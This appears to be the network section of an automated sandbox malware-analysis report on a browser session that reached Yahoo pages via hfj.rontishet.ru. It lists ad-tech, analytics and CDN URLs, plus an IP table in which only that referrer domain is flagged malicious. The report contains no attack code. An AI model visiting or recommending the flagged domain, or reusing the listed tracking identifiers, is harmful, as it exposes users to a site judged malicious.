                                                                                                                                                                                                                                                                                                                                    https://www.yahoo.com/fp_ms/_rcv/remote?ctrl=GamesMini&lang=en-US&m_id=react-wafer-games&m_mode=json&region=US&rid=1pa4ckpjflnfm&site=fp&apptype=default&instance_id=games&_evtSrc=deferLoadfalse
                                                                                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                                                                                      https://vidanalytics.taboola.com/putes/mboxfalse
                                                                                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                                                                                        https://geo.yahoo.com/p?s=2023538075&t=RWPl4r0mhQZMucm4,0.012305361857688046&_I=&_AO=0&_NOL=0&_R=https%3A%2F%2Fhfj.rontishet.ru%2F&_P=3.54.3%05_a1s%03d%3DAQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA%26S%3DAQAAAtFHlIsUsTVNy2XXUR1j0uw%04_pl%031%04A_v%033.54.3%04A_cn%03ANALYTICS-VERSIONED-PROD%04test%03900%2Cseamless%04_bt%03rapid%04A_pr%03https%04A_tzoff%03-4%04A_sid%03PkFpySMy8UR4yGbo%04_w%03www.yahoo.com%2F%04_rid%031pa4ckpjflnfm%04abk%03%04colo%03bf1%04mrkt%03us%04p_sec%03default%04partner%03none%04site%03fp%04uh_vw%030%04pt%03home%04navtype%03server%04ver%03megastrm%04version%03US%04uloc%03AAEBAQJERQIEAMK5AwMEACWF6wQEAMAZHgUEAXjomwcEACPSRwgEAWVv0Q%04etrg%03hide%04outcm%03window%04usergenf%031%04etag%03dwell%2Cstop%04A_jse%03window.blur%04A_prets%031727716884%04A_prems%03277%04_E%03dwell%04_ts%031727716884%04_ms%03284%04A_sr%031280x1024%04A_vr%031280x984%04A_do%031%04A_ib%031280x907%04A_ob%031280x984%04A_srr%031false
                                                                                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                                                                                          https://finance.yahoo.com/assets/_app/immutable/assets/Ticker.BZjnd4DS.cssfalse
                                                                                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                                                                                            https://geo.yahoo.com/p?s=2023538075&t=P00ZodOk1As26NE3,0.564438298676045&_I=&_AO=0&_NOL=0&_R=https%3A%2F%2Fhfj.rontishet.ru%2F&_P=3.54.3%05_a1s%03d%3DAQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA%26S%3DAQAAAtFHlIsUsTVNy2XXUR1j0uw%04_pl%031%04A_v%033.54.3%04A_cn%03ANALYTICS-VERSIONED-PROD%04test%03900%2Cseamless%04_bt%03rapid%04A_pr%03https%04A_tzoff%03-4%04A_sid%03PkFpySMy8UR4yGbo%04_w%03www.yahoo.com%2F%04_rid%031pa4ckpjflnfm%04abk%03%04colo%03bf1%04mrkt%03us%04p_sec%03default%04partner%03none%04site%03fp%04uh_vw%030%04pt%03home%04navtype%03server%04ver%03megastrm%04version%03US%04uloc%03AAEBAQJERQIEAMK5AwMEACWF6wQEAMAZHgUEAXjomwcEACPSRwgEAWVv0Q%04etrg%03hide%04outcm%03window%04usergenf%031%04etag%03dwell%2Cstop%04A_jse%03document.visibilitychange%04A_prets%031727716898%04A_prems%03610%04_E%03dwell%04_ts%031727716898%04_ms%03613%04A_sr%031280x1024%04A_vr%031280x984%04A_do%031%04A_ib%031280x907%04A_ob%031280x984%04A_srr%031false
                                                                                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                                                                                              https://x.bidswitch.net/sync?ssp=adaptmx&user_id=85b2d118-423d-4245-b001-a881df171c6a&gdpr=0&gdpr_consent=&us_privacy=1YNN&gpp=DBAA&gpp_sid=-1false
                                                                                                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                                                                                                https://geo.yahoo.com/p?s=2023538075&t=mYjTLHF1rhHaiCYy,0.5641529438620672&_I=&_AO=0&_NOL=0&_R=https%3A%2F%2Fhfj.rontishet.ru%2F&_P=3.54.3%05_a1s%03d%3DAQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA%26S%3DAQAAAtFHlIsUsTVNy2XXUR1j0uw%04_pl%031%04A_v%033.54.3%04A_cn%03ANALYTICS-VERSIONED-PROD%04test%03900%2Cseamless%04_bt%03rapid%04A_pr%03https%04A_tzoff%03-4%04A_sid%03PkFpySMy8UR4yGbo%04_w%03www.yahoo.com%2F%04_rid%031pa4ckpjflnfm%04abk%03%04colo%03bf1%04mrkt%03us%04p_sec%03default%04partner%03none%04site%03fp%04uh_vw%030%04pt%03home%04navtype%03server%04ver%03megastrm%04version%03US%04uloc%03AAEBAQJERQIEAMK5AwMEACWF6wQEAMAZHgUEAXjomwcEACPSRwgEAWVv0Q%04etrg%03show%04outcm%03window%04usergenf%031%04etag%03dwell%2Cstart%04A_jse%03document.visibilitychange%04A_prets%031727716915%04A_prems%03295%04_E%03dwell%04_ts%031727716915%04_ms%03452%04A_sr%031280x1024%04A_vr%031280x984%04A_do%031%04A_ib%031280x907%04A_ob%031280x984%04A_srr%031false
                                                                                                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                                                                                                  https://s.yimg.com/ss/analytics-3.54.3.jsfalse
                                                                                                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                                                                                                    https://sync.1rx.io/usersync2/rubicon?gdpr=0&us_privacy=1YNNfalse
                                                                                                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                                                                                                      https://geo.yahoo.com/p?s=2023538075&t=4bKjterkWNks3RFf,0.7113294770778253&_I=&_AO=0&_NOL=0&_R=https%3A%2F%2Fhfj.rontishet.ru%2F&_P=3.54.3%05_a1s%03d%3DAQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA%26S%3DAQAAAtFHlIsUsTVNy2XXUR1j0uw%04_pl%031%04A_v%033.54.3%04A_cn%03ANALYTICS-VERSIONED-PROD%04test%03900%2Cseamless%04_bt%03rapid%04A_pr%03https%04A_tzoff%03-4%04A_sid%03PkFpySMy8UR4yGbo%04_w%03www.yahoo.com%2F%04_rid%031pa4ckpjflnfm%04abk%03%04colo%03bf1%04mrkt%03us%04p_sec%03default%04partner%03none%04site%03fp%04uh_vw%030%04pt%03home%04navtype%03server%04ver%03megastrm%04version%03US%04uloc%03AAEBAQJERQIEAMK5AwMEACWF6wQEAMAZHgUEAXjomwcEACPSRwgEAWVv0Q%04etrg%03hide%04outcm%03window%04usergenf%031%04etag%03dwell%2Cstop%04A_jse%03document.visibilitychange%04A_prets%031727716888%04A_prems%03206%04_E%03dwell%04_ts%031727716888%04_ms%03213%04A_sr%031280x1024%04A_vr%031280x984%04A_do%031%04A_ib%031280x907%04A_ob%031280x984%04A_srr%031false
                                                                                                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                                                                                                        https://t.adx.opera.com/pub/sync?pubid=pub11169426274368&coppa=&us_privacy=false
                                                                                                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                                                                                                          https://x.bidswitch.net/sync?dsp_id=76&user_group=2&ssp=gumgum2&gdpr=0&user_id=QhGecxBCyXFZHsl3QB_VIxVByHZZEMAiQ0beJgP4false
                                                                                                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                                                                                                            https://finance.yahoo.com/assets/_app/immutable/chunks/each.CI2tb2RB.jsfalse
                                                                                                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                                                                                                              https://finance.yahoo.com/assets/_app/immutable/chunks/loadNewsStream.DpYg868c.jsfalse
                                                                                                                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                                                                                                                https://ups.analytics.yahoo.com/ups/58834/sync?format=json&gdpr=false&gdpr_consent=&gpp=DBAA&gpp_sid=-1&us_privacy=1YNNfalse
                                                                                                                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                                                                                                                  https://tsdtocl.com/false
                                                                                                                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                                                                                                                    https://finance.yahoo.com/assets/_app/immutable/chunks/chevron_left.CltsmSmq.jsfalse
                                                                                                                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                                                                                                                      https://finance.yahoo.com/__rapidworker-1.2.jsfalse
                                                                                                                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                                                                                                                        https://geo.yahoo.com/p?s=2023538075&t=js5dE2arzgzOjqsj,0.44399167107659143&_I=&_AO=0&_NOL=0&_R=https%3A%2F%2Fhfj.rontishet.ru%2F&_P=3.54.3%05_a1s%03d%3DAQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA%26S%3DAQAAAtFHlIsUsTVNy2XXUR1j0uw%04_pl%031%04A_v%033.54.3%04A_cn%03ANALYTICS-VERSIONED-PROD%04test%03900%2Cseamless%04_bt%03rapid%04A_pr%03https%04A_tzoff%03-4%04A_sid%03PkFpySMy8UR4yGbo%04_w%03www.yahoo.com%2F%04_rid%031pa4ckpjflnfm%04abk%03%04colo%03bf1%04mrkt%03us%04p_sec%03default%04partner%03none%04site%03fp%04uh_vw%030%04pt%03home%04navtype%03server%04ver%03megastrm%04version%03US%04uloc%03AAEBAQJERQIEAMK5AwMEACWF6wQEAMAZHgUEAXjomwcEACPSRwgEAWVv0Q%04etrg%03show%04outcm%03window%04usergenf%031%04etag%03dwell%2Cstart%04A_jse%03document.visibilitychange%04A_prets%031727716913%04A_prems%03510%04_E%03dwell%04_ts%031727716913%04_ms%03730%04A_sr%031280x1024%04A_vr%031280x984%04A_do%031%04A_ib%031280x907%04A_ob%031280x984%04A_srr%031false
                                                                                                                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                                                                                                                          https://geo.yahoo.com/p?s=2023538075&t=P6Pr15BRy4eVoAy7,0.1688161860470252&_I=&_AO=0&_NOL=0&_R=https%3A%2F%2Fhfj.rontishet.ru%2F&_P=3.54.3%05_a1s%03d%3DAQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA%26S%3DAQAAAtFHlIsUsTVNy2XXUR1j0uw%04_pl%031%04A_v%033.54.3%04A_cn%03ANALYTICS-VERSIONED-PROD%04test%03900%2Cseamless%04_bt%03rapid%04A_pr%03https%04A_tzoff%03-4%04A_sid%03PkFpySMy8UR4yGbo%04_w%03www.yahoo.com%2F%04_rid%031pa4ckpjflnfm%04abk%03%04colo%03bf1%04mrkt%03us%04p_sec%03default%04partner%03none%04site%03fp%04uh_vw%030%04pt%03home%04navtype%03server%04ver%03megastrm%04version%03US%04uloc%03AAEBAQJERQIEAMK5AwMEACWF6wQEAMAZHgUEAXjomwcEACPSRwgEAWVv0Q%04etrg%03hide%04outcm%03window%04usergenf%031%04etag%03dwell%2Cstop%04A_jse%03document.visibilitychange%04A_prets%031727716900%04A_prems%03619%04_E%03dwell%04_ts%031727716900%04_ms%03622%04A_sr%031280x1024%04A_vr%031280x984%04A_do%031%04A_ib%031280x907%04A_ob%031280x984%04A_srr%031false
                                                                                                                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                                                                                                                            https://geo.yahoo.com/p?s=2023538075&t=i8RFrF7kc05ukhwI,0.030651178706840865&_I=&_AO=0&_NOL=0&_R=https%3A%2F%2Fhfj.rontishet.ru%2F&_P=3.54.3%05_a1s%03d%3DAQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA%26S%3DAQAAAtFHlIsUsTVNy2XXUR1j0uw%04_pl%031%04A_v%033.54.3%04A_cn%03ANALYTICS-VERSIONED-PROD%04test%03900%2Cseamless%04_bt%03rapid%04A_pr%03https%04A_tzoff%03-4%04A_sid%03PkFpySMy8UR4yGbo%04_w%03www.yahoo.com%2F%04_rid%031pa4ckpjflnfm%04abk%03%04colo%03bf1%04mrkt%03us%04p_sec%03default%04partner%03none%04site%03fp%04uh_vw%030%04pt%03home%04navtype%03server%04ver%03megastrm%04version%03US%04uloc%03AAEBAQJERQIEAMK5AwMEACWF6wQEAMAZHgUEAXjomwcEACPSRwgEAWVv0Q%04etrg%03show%04outcm%03window%04usergenf%031%04etag%03dwell%2Cstart%04A_jse%03document.visibilitychange%04A_prets%031727716911%04A_prems%03251%04_E%03dwell%04_ts%031727716911%04_ms%03353%04A_sr%031280x1024%04A_vr%031280x984%04A_do%031%04A_ib%031280x907%04A_ob%031280x984%04A_srr%031false
                                                                                                                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                                                                                                                              https://rtb.adentifi.com/CookieSyncTripleLift?gdpr=0&gdpr_consent=false
                                                                                                                                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                                                                                                                                https://finance.yahoo.com/assets/_app/immutable/assets/ResearchReports.B2KK9kVy.cssfalse
                                                                                                                                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                                                                                                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                                                                                                                                                                                                  https://www.cnn.com/weather/live-news/hurricane-helene-florida-north-carolina-georgia-09-30-24/indexchromecache_1198.2.dr, chromecache_1077.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                                                                                                                                    https://s.yimg.com/ny/api/res/1.2/MZoDSOkdfFVM5mC2aKTdfQ--/YXBwaWQ9aGlnaGxhbmRlcjt3PTk2MDtoPTY0MQ--/chromecache_1198.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                                                                                                                                      https://s.yimg.com/ny/api/res/1.2/uWgN5MwziJAdydDgekM9TA--/YXBwaWQ9aGlnaGxhbmRlcjt3PTI0MDA-/https://chromecache_1197.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                                                                                                                                        https://s.yimg.com/ny/api/res/1.2/7pBBQ0VHMr4GSe16kRpffQ--/YXBwaWQ9aGlnaGxhbmRlcjt3PTk2MDtoPTY0MTtjZchromecache_846.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                                                                                                                                          https://wwd.com/fashion-news/fashion-features/gallery/the-last-showgirl-tiff-2024-red-carpet-photos-chromecache_1198.2.dr, chromecache_1077.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                                                                                                                                            https://mwzeom.zeotap.com/mw?zpartnerid=1384&env=mWeb&gdpr=0&gdpr_consent=&cid=176682A8-E121-44A7-81chromecache_1258.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                                                                                                                                              https://s.yimg.com/ny/api/res/1.2/dYWkFglljzFtelabSwqMhA--/YXBwaWQ9aGlnaGxhbmRlcjt3PTIwMDA7aD0yODYwOchromecache_1077.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                                                                                                                                                https://dsp-ap.eskimi.com/pixelGet?ex=50&gdpr=chromecache_445.2.dr, chromecache_880.2.dr, chromecache_588.2.dr, chromecache_556.2.dr, chromecache_1082.2.dr, chromecache_1099.2.dr, chromecache_894.2.dr, chromecache_545.2.dr, chromecache_707.2.dr, chromecache_670.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                                                                                                                                                  https://ep1.adtrafficquality.google/pagead/gen_204?id=sodar2&v=231chromecache_523.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                                                                                                                                                    https://ep1.adtrafficquality.google/pagead/gen_204?id=sodar2&v=232chromecache_1358.2.dr, chromecache_1002.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                                                                                                                                                      https://apnews.com/article/hurricane-helene-tropical-weather-destruction-16b41006d3cb6fedad78d19ca3fchromecache_1198.2.dr, chromecache_1077.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                                                                                                                                                        https://wwd.com/eye/people/pamela-anderson-cover-story-netflix-documentary-memoir-1235511775/chromecache_1198.2.dr, chromecache_1077.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                                                                                                                                                          https://uipglob.semasio.net/pubmatic/1/info?sType=sync&sExtCookieId=176682A8-E121-44A7-818D-4FE53D54chromecache_1258.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                                                                                                                                                            https://s.yimg.com/ny/api/res/1.2/yZlH5dp1YliC6.iAvXGPpw--/YXBwaWQ9aGlnaGxhbmRlcjt3PTIwMDA7aD0yMDAwOchromecache_1077.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                                                                                                                                                              https://b1sync.zemanta.com/usersync/openx?puid=a217410b-ab91-0b95-0924-e56231c5c33c&cb=https%3A%2F%2chromecache_643.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                                                                                                                                                                https://shopping.yahoo.com/rdlw?merchantId=66ea567a-c987-4c2e-a2ff-02904efde6ea&siteId=us-lifestyle&chromecache_1197.2.dr, chromecache_466.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                                                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                                                                                                                                                                                  • 75% < No. of IPs
                                                                                                                                                                                                                                                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                                                                                                                                                                                  199.232.211.52
                                                                                                                                                                                                                                                                                                                                                                                                                  dualstack.ioriver.map.fastly.netUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  142.250.185.100
                                                                                                                                                                                                                                                                                                                                                                                                                  www.google.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  34.95.69.49
                                                                                                                                                                                                                                                                                                                                                                                                                  i.clean.ggUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  3.160.150.30
                                                                                                                                                                                                                                                                                                                                                                                                                  sync.intentiq.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  54.154.153.241
                                                                                                                                                                                                                                                                                                                                                                                                                  aws-bid-global.ybp.gysm.yahoodns.netUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  99.80.51.253
                                                                                                                                                                                                                                                                                                                                                                                                                  raptor-prd-ew1-alb-2127381300.eu-west-1.elb.amazonaws.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  3.219.229.28
                                                                                                                                                                                                                                                                                                                                                                                                                  k8s-kongow-monitorp-157cd18d00-964647605.us-east-1.elb.amazonaws.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  212.82.100.137
                                                                                                                                                                                                                                                                                                                                                                                                                  ds-global3.l7.search.ystg1.b.yahoo.comUnited Kingdom
                                                                                                                                                                                                                                                                                                                                                                                                                  34010YAHOO-IRDGBfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  185.89.210.20
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownGermany
                                                                                                                                                                                                                                                                                                                                                                                                                  29990ASN-APPNEXUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  198.47.127.205
                                                                                                                                                                                                                                                                                                                                                                                                                  pug-ams-bc.pubmnet.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  62713AS-PUBMATICUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  37.252.171.52
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownEuropean Union
                                                                                                                                                                                                                                                                                                                                                                                                                  29990ASN-APPNEXUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  35.71.131.137
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  237MERIT-AS-14USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  151.101.193.44
                                                                                                                                                                                                                                                                                                                                                                                                                  dualstack.tls13.taboola.map.fastly.netUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  35.214.199.88
                                                                                                                                                                                                                                                                                                                                                                                                                  dorpat.geo.iponweb.netUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  19527GOOGLE-2USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  3.127.201.16
                                                                                                                                                                                                                                                                                                                                                                                                                  sonata-notifications.taptapnetworks.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  18.196.164.227
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  172.67.208.129
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  151.101.1.44
                                                                                                                                                                                                                                                                                                                                                                                                                  tls13.taboola.map.fastly.netUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  107.178.254.65
                                                                                                                                                                                                                                                                                                                                                                                                                  pippio.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  239.255.255.250
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownReserved
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownunknownfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  54.194.192.48
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  151.101.65.44
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  152.195.53.200
                                                                                                                                                                                                                                                                                                                                                                                                                  cs550162656.adn.psicdn.netUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  15133EDGECASTUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  18.207.87.2
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  172.67.149.20
                                                                                                                                                                                                                                                                                                                                                                                                                  wnsrvbjmeprtfrnfx.ay.deliveryUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  35.156.245.234
                                                                                                                                                                                                                                                                                                                                                                                                                  cs.emxdgt.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  185.255.84.152
                                                                                                                                                                                                                                                                                                                                                                                                                  visitor-fra02.omnitagjs.comFrance
                                                                                                                                                                                                                                                                                                                                                                                                                  200271IGUANE-FRfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  185.255.84.153
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownFrance
                                                                                                                                                                                                                                                                                                                                                                                                                  200271IGUANE-FRfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  211.120.53.202
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownJapan4694IDCFIDCFrontierIncJPfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  18.157.230.4
                                                                                                                                                                                                                                                                                                                                                                                                                  eu-tlx.3lift.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  208.93.169.131
                                                                                                                                                                                                                                                                                                                                                                                                                  am1-direct-bgp.contextweb.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  26228SERVEPATHUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  216.58.206.36
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  87.248.119.251
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownUnited Kingdom
                                                                                                                                                                                                                                                                                                                                                                                                                  203220YAHOO-DEBDEfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  54.194.52.65
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  87.248.119.252
                                                                                                                                                                                                                                                                                                                                                                                                                  edge-prebid-cdn.g03.yahoodns.netUnited Kingdom
                                                                                                                                                                                                                                                                                                                                                                                                                  203220YAHOO-DEBDEfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  141.226.228.48
                                                                                                                                                                                                                                                                                                                                                                                                                  am-vip001.taboola.comIsrael
                                                                                                                                                                                                                                                                                                                                                                                                                  200478TABOOLA-ASILfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  52.215.155.11
                                                                                                                                                                                                                                                                                                                                                                                                                  rtb.adgrx.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  54.175.124.176
                                                                                                                                                                                                                                                                                                                                                                                                                  sync.srv.stackadapt.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  178.250.1.9
                                                                                                                                                                                                                                                                                                                                                                                                                  widget.nl3.vip.prod.criteo.comFrance
                                                                                                                                                                                                                                                                                                                                                                                                                  44788ASN-CRITEO-EUROPEFRfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  178.250.1.7
                                                                                                                                                                                                                                                                                                                                                                                                                  ssp-sync.nl3.vip.prod.criteo.comFrance
                                                                                                                                                                                                                                                                                                                                                                                                                  44788ASN-CRITEO-EUROPEFRfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  35.186.154.107
                                                                                                                                                                                                                                                                                                                                                                                                                  cm-supply-web.gammaplatform.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  88.221.124.22
                                                                                                                                                                                                                                                                                                                                                                                                                  unknownEuropean Union
                                                                                                                                                                                                                                                                                                                                                                                                                  16625AKAMAI-ASUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  172.67.147.215
                                                                                                                                                                                                                                                                                                                                                                                                                  hfj.rontishet.ruUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                                                                                                                                                                                  178.250.1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  static.nl3.vip.prod.criteo.netFrance
                                                                                                                                                                                                                                                                                                                                                                                                                  44788ASN-CRITEO-EUROPEFRfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  34.102.163.6
                                                                                                                                                                                                                                                                                                                                                                                                                  ad.mrtnsvr.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  52.212.106.216
                                                                                                                                                                                                                                                                                                                                                                                                                  dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloudUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  46.228.174.117
                                                                                                                                                                                                                                                                                                                                                                                                                  sync.1rx.ioUnited Kingdom
                                                                                                                                                                                                                                                                                                                                                                                                                  56396TURNGBfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  18.245.60.72
                                                                                                                                                                                                                                                                                                                                                                                                                  sb.scorecardresearch.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  35.214.174.141
                                                                                                                                                                                                                                                                                                                                                                                                                  pool-eu.zagreb.iponweb.netUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                  19527GOOGLE-2USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  104.18.37.193
                                                                                                                                                                                                                                                                                                                                                                                                                  a.tribalfusion.comUnited States
